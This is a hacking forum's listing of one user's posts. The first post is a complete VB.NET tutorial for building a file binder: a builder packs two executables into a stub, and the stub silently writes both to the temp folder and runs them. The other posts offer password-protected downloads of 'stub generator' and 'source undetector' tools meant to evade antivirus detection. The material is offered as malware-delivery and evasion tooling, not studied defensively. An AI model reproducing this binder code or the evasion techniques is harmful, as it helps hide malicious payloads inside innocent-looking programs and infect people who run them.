Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - The Punisher

#1
C# - VB.NET / Make your own binder Quick [TUT]
Mayo 04, 2010, 06:48:05 PM
Binder Quick TUT

Today I decided to write a tutorial on how to make your own binder in Visual Basic 2008. It's a simple crypter just binds 2 executable files.

BUILDER :

Add the following forms:

2 buttons
2textboxs


You're form should look like this:




Okay, now double click the BUTTON 1 and type the following code:


Código: csharp
        Dim ofd As New OpenFileDialog
        ofd.Title = ""
        ofd.Filter = "*.exe | *.exe"
        ofd.Title = "File 1"
        If ofd.ShowDialog = Windows.Forms.DialogResult.OK Then TextBox1.Text = ofd.FileName
        ofd.Title = "File 2"
        If ofd.ShowDialog = Windows.Forms.DialogResult.OK Then TextBox2.Text = ofd.FileName


And then double click the BUTTON 2 and type this code:

Código: csharp
        Dim stub, File_One, File_Two, Filename1, filename2 As String
        Const FileSplit = "47150"
        FileOpen(1, TextBox1.Text, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
        File_One = Space(LOF(1))
        FileGet(1, File_One)
        FileClose(1)

        FileOpen(2, TextBox2.Text, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
        File_Two = Space(LOF(2))
        FileGet(2, File_Two)
        FileClose(2)

        FileOpen(3, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
        stub = Space(LOF(3))
        FileGet(3, stub)
        FileClose(3)
        Dim OutputFile As String
        Dim sfd As New SaveFileDialog
        sfd.Filter = "*.exe | *.exe"
        If sfd.ShowDialog = Windows.Forms.DialogResult.OK Then
            OutputFile = sfd.FileName
        Else : Exit Sub
        End If
        Filename1 = TextBox1.Text.Substring(TextBox1.Text.LastIndexOf("\"))
        filename2 = TextBox2.Text.Substring(TextBox2.Text.LastIndexOf("\"))
        FileOpen(3, OutputFile, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
        FilePut(3, stub & FileSplit & File_One & FileSplit & File_Two & FileSplit & Filename1 & FileSplit & filename2)
        FileClose(3)
        MsgBox("Binded")


Now you're done with builder, make a new form called "Stub".

STUB:

Here we don't need any forms .. just click on the form and add the following code :
Código: csharp
 On Error Resume Next
        Dim TPath As String = System.IO.Path.GetTempPath
        Const FileSplit = "47150"
        Dim file1, joesdaddy, filez() As String
        FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
        file1 = Space(LOF(1))
        FileGet(1, file1)
        FileClose(1)
        filez = Split(file1, FileSplit)
        FileOpen(3, TPath & filez(3), OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
        FilePut(3, filez(1))
        FileClose(3)
        FileOpen(5, TPath & filez(4), OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
        FilePut(5, filez(2))
        FileClose(5)
        System.Diagnostics.Process.Start(TPath & filez(3))
        System.Diagnostics.Process.Start(TPath & filez(4))
        Me.Close()
        End


Note:You must use the same filesplit in builder and stub otherwise it won't work. My filesplit is "47150".

Nathan72389-Source Code.
#2
Hi , Brothers :

[SRC] Unique Stub Generator + Source Undetector



Features:

-Encrypt all strings
-Automatic junk code
-Fake module adding
-Batch generating (buggy)
-Auto compile

Código: php
HackHound.org
'#Released: Feb 02 2010
'#          I made this a long time ago for my personal use.
'#          This might be a little buggy.
'#          You might need to change this a little to work with your sources
'#          You can easily change/add different encryptions etc to this.
'#          To get fake modules/class modules to work, just get some modules/class modules
'#          from somewhere and paste them in the Modules Folder and change 2 lines of code in frmAuto.


Download :

Link : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
PASS :
Código: php
antrax
[/size]
#3
Hola , Source Undetector by carb0n[OpenSource]

This Source has string encryption, api encryption, randomize subs, function names, and much more, enjoy.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Download : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pass : antrax